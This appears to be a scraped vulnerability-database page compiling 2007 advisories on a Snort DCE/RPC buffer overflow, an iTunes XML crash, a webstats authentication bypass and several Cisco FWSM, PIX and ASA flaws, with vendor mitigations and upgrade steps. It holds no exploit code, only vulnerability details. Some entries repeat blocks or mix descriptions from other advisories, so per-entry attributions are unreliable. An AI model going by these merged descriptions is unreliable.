VARIoT IoT vulnerabilities database

Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Apple iTunes 7.0.2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted XML list of radio stations, which results in memory corruption. NOTE: iTunes retrieves the XML document from a static URL, which requires an attacker to perform DNS spoofing or man-in-the-middle attacks for exploitation. Apple iTunes is prone to a remote denial-of-service vulnerability because the application fails to handle malformed XML playlist files. An attacker can exploit this issue to crash the application, triggering a denial-of-service condition. Apple iTunes version 7.0.2 for Intel and PowerPC are vulnerable to this issue; other versions may also be affected

Ezboo webstats, possibly 3.0.3, allows remote attackers to bypass authentication and gain access via a direct request to (1) update.php and (2) config.php. Ezboo webstats is a statistical tool for website monitoring

Unspecified vulnerability in Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.3), when set to log at the "debug" level, allows remote attackers to cause a denial of service (device reboot) by sending packets that are not of a particular protocol such as TCP or UDP, which triggers the reboot during generation of Syslog message 710006. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Multiple security vulnerabilities exist in Cisco PIX 500 Series Security Appliances and Cisco ASA 5500 Series Adaptive Security Appliances: Processing packets sent to FWSM could lead to reload +---------------- --------------------------------------- This vulnerability causes FWSM to generate 710006 syslog messages when attempting to overload occurs. The following two conditions must be met for this vulnerability to occur: * FWSM receives a message with a device IP address and the message is not the following protocol: TCP, UDP, ICMP, OSPF, Failover, PIM, IGMP, and ESP. Vulnerabilities are independent of the source of the packets. * Logging must be enabled at a high enough level to generate 710006 syslog messages, the default is debug level (level 7). Note that logging is disabled by default, and Cisco recommends logging at the debug level for debugging and error correction purposes only. This vulnerability is documented in Cisco Bug ID as CSCse85707. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco Firewall Services Module Multiple Vulnerabilities SECUNIA ADVISORY ID: SA24172 VERIFY ADVISORY: http://secunia.com/advisories/24172/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS WHERE: >From remote SOFTWARE: Cisco Firewall Services Module (FWSM) 3.x http://secunia.com/product/8614/ DESCRIPTION: Some vulnerabilities and a security issue have been reported in Cisco Firewall Services, which can be exploited by malicious people to cause a DoS or bypass certain security restrictions. 1) An unspecified error within the enhanced inspection of HTTP traffic can be exploited to cause the device to reload via specially crafted HTTP traffic. Successful exploitation requires that enhanced inspection is enabled. 2) An error within the inspection of SIP packets can be exploited to cause the device to reload via specially crafted SIP packets. Successful exploitation requires that SIP inspection is enabled. 3) An unspecified error when processing malformed HTTPS requests can be exploited to cause the device to reload by sending specially crafted HTTPS requests. Successful exploitation requires that "authentication for network access" (auth-proxy) is enabled. 4) An error when processing HTTP requests with a very long URL can be exploited to cause the device to reload, but requires that "authentication for network access" (auth-proxy) is enabled. 5) An unspecified error exists when processing HTTPS traffic that is directed to the FWSM. This can be exploited to cause the device to reload by sending specially crafted HTTPS requests, but requires that the HTTPS server is enabled. 6) An unspecified error when processing malformed SNMP requests from a trusted device can be exploited to cause the affected device to reload. Successful exploitation requires that the other, trusted device has explicit SNMP poll access. 7) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated. A vulnerability that could cause the device to reload when "debugging" is enabled has also been reported. SOLUTION: Apply updated software. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to use the LOCAL authentication method, allows remote authenticated users to gain privileges via unspecified vectors. Cisco PIX 500 Series and Cisco ASA 5500 series The security appliance has user authentication. LOCAL A vulnerability exists that could allow elevation of privilege by remotely authenticated users when using the method. According to information from Cisco Systems, users who exploit this vulnerability are privileged. 0 Defined in the local database, only in this case the user is privileged 15 Has been reported to be able to be elevated to administrator privileges.On devices under certain conditions, it may be possible to gain administrative privileges from a remotely authenticated user. Exploiting this issue allows authenticated attackers to gain administrative privileges on affected computers. This may facilitate the complete compromise of the affected device. This issue is tracked by Cisco Bug ID: CSCsh33287. Both the Cisco PIX and the ASA are very popular firewall devices that provide firewall services capable of stateful packet filtering and deep packet inspection. Remote attackers may use this loophole to elevate their privileges on the device. Only users who meet these conditions can escalate their assigned privileges to level 15. Once an administrator, users can change every aspect of device configuration and operation. A device is affected by this vulnerability if the following line exists in the device configuration: pixfirewall(config)# aaa authentication enable console LOCAL pixfirewall(config)# username <user_name> password <secret_pwd> privilege 0 This vulnerability is documented in Cisco Bug ID as CSCsh33287. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco PIX and ASA Privilege Escalation and Denial of Service SECUNIA ADVISORY ID: SA24160 VERIFY ADVISORY: http://secunia.com/advisories/24160/ CRITICAL: Moderately critical IMPACT: Privilege escalation, DoS WHERE: >From remote OPERATING SYSTEM: Cisco PIX 7.x http://secunia.com/product/6102/ Cisco Adaptive Security Appliance (ASA) 7.x http://secunia.com/product/6115/ DESCRIPTION: Some vulnerabilities have been reported in Cisco PIX and ASA, which can be exploited by malicious users to gain escalated privileges and by malicious people to cause a DoS (Denial of Service). 1) An unspecified error exists within the enhanced HTTP inspection feature. This can be exploited to crash the device via malformed HTTP requests, but requires that enhanced HTTP inspection is enabled. 2) An unspecified error exists within the SIP packet inspection. This can be exploited to crash the device by sending specially crafted SIP packets, but requires that "inspect" is enabled (it is disabled by default). 3) An unspecified error exists within the TCP-based protocol inspection. This can be exploited to crash the device via malformed packets, but requires that inspection of TCP-based protocols (e.g. FTP or HTTP) is enabled. Successful exploitation allows gaining privilege level 15 and changing the complete configuration of the device, but requires that the attacker can authenticate to the device and that he is defined in the local database with privilege level 0. SOLUTION: Apply updated versions. See the vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . 2) An unspecified vulnerability when manipulating ACLs (Access Control Lists) that makes use of object groups can be exploited to corrupt ACLs, resulting in ACE (Access Control Entries) being skipped or not evaluated in order. Successful exploitation requires that "SIP fixup" is enabled, which is the default setting

Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.1) allows remote attackers to cause a denial of service (device reboot) via malformed SNMP requests. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. This vulnerability is documented in Cisco Bug ID as CSCse52679. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 1) An unspecified error within the enhanced inspection of HTTP traffic can be exploited to cause the device to reload via specially crafted HTTP traffic. Successful exploitation requires that enhanced inspection is enabled. 2) An error within the inspection of SIP packets can be exploited to cause the device to reload via specially crafted SIP packets. Successful exploitation requires that SIP inspection is enabled. 3) An unspecified error when processing malformed HTTPS requests can be exploited to cause the device to reload by sending specially crafted HTTPS requests. Successful exploitation requires that "authentication for network access" (auth-proxy) is enabled. 4) An error when processing HTTP requests with a very long URL can be exploited to cause the device to reload, but requires that "authentication for network access" (auth-proxy) is enabled. 5) An unspecified error exists when processing HTTPS traffic that is directed to the FWSM. This can be exploited to cause the device to reload by sending specially crafted HTTPS requests, but requires that the HTTPS server is enabled. Successful exploitation requires that the other, trusted device has explicit SNMP poll access. 7) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated. A vulnerability that could cause the device to reload when "debugging" is enabled has also been reported. SOLUTION: Apply updated software. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Cisco Firewall Services Module (FWSM) before 2.3(4.7) and 3.x before 3.1(3.1) causes the access control entries (ACE) in an ACL to be improperly evaluated, which allows remote authenticated users to bypass intended certain ACL protections. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Multiple security vulnerabilities exist in Cisco PIX 500 Series Security Appliances and Cisco ASA 5500 Series Adaptive Security Appliances: Enhanced Inspection Malformed HTTP Traffic +--------------------- -------------------------- Cisco PIX and ASA Security Appliances may crash when checking for malformed HTTP requests if Enhanced HTTP Inspection is enabled . If HTTP application inspection is enabled, the configuration will contain a line similar to inspect http, where the name of the specific HTTP mapping. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability. This vulnerability is documented in Cisco Bug ID as CSCsd75794. To trigger this vulnerability, the SIP fixup (for 6.x software) or inspect (for 7.x software) function must be enabled. SIP fixup (in 6.x and earlier) and SIP check (in 7. x and earlier) is enabled by default. This vulnerability is documented in Cisco Bug IDs as CSCsd97077 and CSCse27708. Check malformed TCP packet flow+------------------------------------------- ------ Cisco PIX and ASA equipment may crash when processing malformed packet flow based on TCP protocol. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) *... ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 1) An unspecified error within the enhanced inspection of HTTP traffic can be exploited to cause the device to reload via specially crafted HTTP traffic. Successful exploitation requires that enhanced inspection is enabled. 2) An error within the inspection of SIP packets can be exploited to cause the device to reload via specially crafted SIP packets. Successful exploitation requires that SIP inspection is enabled. 3) An unspecified error when processing malformed HTTPS requests can be exploited to cause the device to reload by sending specially crafted HTTPS requests. Successful exploitation requires that "authentication for network access" (auth-proxy) is enabled. 4) An error when processing HTTP requests with a very long URL can be exploited to cause the device to reload, but requires that "authentication for network access" (auth-proxy) is enabled. 5) An unspecified error exists when processing HTTPS traffic that is directed to the FWSM. This can be exploited to cause the device to reload by sending specially crafted HTTPS requests, but requires that the HTTPS server is enabled. 6) An unspecified error when processing malformed SNMP requests from a trusted device can be exploited to cause the affected device to reload. Successful exploitation requires that the other, trusted device has explicit SNMP poll access. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated. A vulnerability that could cause the device to reload when "debugging" is enabled has also been reported. SOLUTION: Apply updated software. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco FWSM 3.x before 3.1(3.18), when authentication is configured to use "aaa authentication match" or "aaa authentication include", allows remote attackers to cause a denial of service (device reboot) via a malformed HTTPS request. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Multiple security vulnerabilities exist in Cisco PIX 500 Series Security Appliances and Cisco ASA 5500 Series Adaptive Security Appliances: Enhanced Inspection Malformed HTTP Traffic May Cause Overload+----------------- ----------------------------------------------- This vulnerability may Causes FWSM to overload when performing enhanced inspection of HTTP requests and inspecting malformed HTTP requests. This command is disabled by default. This vulnerability is documented in Cisco Bug ID as CSCsd75794. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco Firewall Services Module Multiple Vulnerabilities SECUNIA ADVISORY ID: SA24172 VERIFY ADVISORY: http://secunia.com/advisories/24172/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS WHERE: >From remote SOFTWARE: Cisco Firewall Services Module (FWSM) 3.x http://secunia.com/product/8614/ DESCRIPTION: Some vulnerabilities and a security issue have been reported in Cisco Firewall Services, which can be exploited by malicious people to cause a DoS or bypass certain security restrictions. 1) An unspecified error within the enhanced inspection of HTTP traffic can be exploited to cause the device to reload via specially crafted HTTP traffic. Successful exploitation requires that enhanced inspection is enabled. 2) An error within the inspection of SIP packets can be exploited to cause the device to reload via specially crafted SIP packets. Successful exploitation requires that SIP inspection is enabled. 3) An unspecified error when processing malformed HTTPS requests can be exploited to cause the device to reload by sending specially crafted HTTPS requests. Successful exploitation requires that "authentication for network access" (auth-proxy) is enabled. 4) An error when processing HTTP requests with a very long URL can be exploited to cause the device to reload, but requires that "authentication for network access" (auth-proxy) is enabled. 5) An unspecified error exists when processing HTTPS traffic that is directed to the FWSM. This can be exploited to cause the device to reload by sending specially crafted HTTPS requests, but requires that the HTTPS server is enabled. 6) An unspecified error when processing malformed SNMP requests from a trusted device can be exploited to cause the affected device to reload. Successful exploitation requires that the other, trusted device has explicit SNMP poll access. 7) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated. A vulnerability that could cause the device to reload when "debugging" is enabled has also been reported. SOLUTION: Apply updated software. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco FWSM 3.x before 3.1(3.2), when authentication is configured to use "aaa authentication match" or "aaa authentication include", allows remote attackers to cause a denial of service (device reboot) via a long HTTP request. Cisco Firewall Services Module fails to properly inspect SIP messages. This vulnerability may allow a remote attacker to cause a denial of service condition. Multiple Cisco products are prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause vulnerable devices to reload, potentially causing denial-of-service conditions. Multiple security vulnerabilities exist in Cisco PIX 500 Series Security Appliances and Cisco ASA 5500 Series Adaptive Security Appliances: Enhanced Inspection Malformed HTTP Traffic +--------------------- -------------------------- Cisco PIX and ASA Security Appliances may crash when checking for malformed HTTP requests if Enhanced HTTP Inspection is enabled . If HTTP application inspection is enabled, the configuration will contain a line similar to inspect http, where the name of the specific HTTP mapping. Note that normal HTTP inspection (configured via inspect http, without HTTP mapping) is not affected by this vulnerability. This vulnerability is documented in Cisco Bug ID as CSCsd75794. To trigger this vulnerability, the SIP fixup (for 6.x software) or inspect (for 7.x software) function must be enabled. SIP fixup (in 6.x and earlier) and SIP check (in 7. x and earlier) is enabled by default. This vulnerability is documented in Cisco Bug IDs as CSCsd97077 and CSCse27708. Check malformed TCP packet flow+------------------------------------------- ------ Cisco PIX and ASA equipment may crash when processing malformed packet flow based on TCP protocol. Protocols must be handled through the inspect function. The message may be sent to the device, or it may only pass through the device. Cisco PIX and ASA appliances can inspect the following TCP-based protocols: * Computer Telephony Interface Quick Buffer Encoding (CITQBE) * Distributed Computing Environment/Remote Procedure Call (DCE/RPC) * Domain Name Service (DNS) * Extended Simple Mail Transfer Protocol (ESMTP) * File Transfer Protocol (FTP) * H.323 Protocol * Hypertext Transfer Protocol (HTTP) * Internet Location Server (ILS) * Instant Messaging (IM) * Point-to-Point Tunneling Protocol (PPTP) * Remote Shell (RSH ) * Real Time Streaming Protocol (RTSP) * Session Initiation Protocol (SIP) *... ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Cisco Firewall Services Module Multiple Vulnerabilities SECUNIA ADVISORY ID: SA24172 VERIFY ADVISORY: http://secunia.com/advisories/24172/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS WHERE: >From remote SOFTWARE: Cisco Firewall Services Module (FWSM) 3.x http://secunia.com/product/8614/ DESCRIPTION: Some vulnerabilities and a security issue have been reported in Cisco Firewall Services, which can be exploited by malicious people to cause a DoS or bypass certain security restrictions. 1) An unspecified error within the enhanced inspection of HTTP traffic can be exploited to cause the device to reload via specially crafted HTTP traffic. Successful exploitation requires that enhanced inspection is enabled. 2) An error within the inspection of SIP packets can be exploited to cause the device to reload via specially crafted SIP packets. Successful exploitation requires that SIP inspection is enabled. 3) An unspecified error when processing malformed HTTPS requests can be exploited to cause the device to reload by sending specially crafted HTTPS requests. Successful exploitation requires that "authentication for network access" (auth-proxy) is enabled. 4) An error when processing HTTP requests with a very long URL can be exploited to cause the device to reload, but requires that "authentication for network access" (auth-proxy) is enabled. 5) An unspecified error exists when processing HTTPS traffic that is directed to the FWSM. This can be exploited to cause the device to reload by sending specially crafted HTTPS requests, but requires that the HTTPS server is enabled. 6) An unspecified error when processing malformed SNMP requests from a trusted device can be exploited to cause the affected device to reload. Successful exploitation requires that the other, trusted device has explicit SNMP poll access. 7) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions. Note: Only an administrative user can change ACLs. Additionally, this does not affected devices which are reloaded after ACLs have been manipulated. A vulnerability that could cause the device to reload when "debugging" is enabled has also been reported. SOLUTION: Apply updated software. Please see vendor advisory for a patch matrix. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

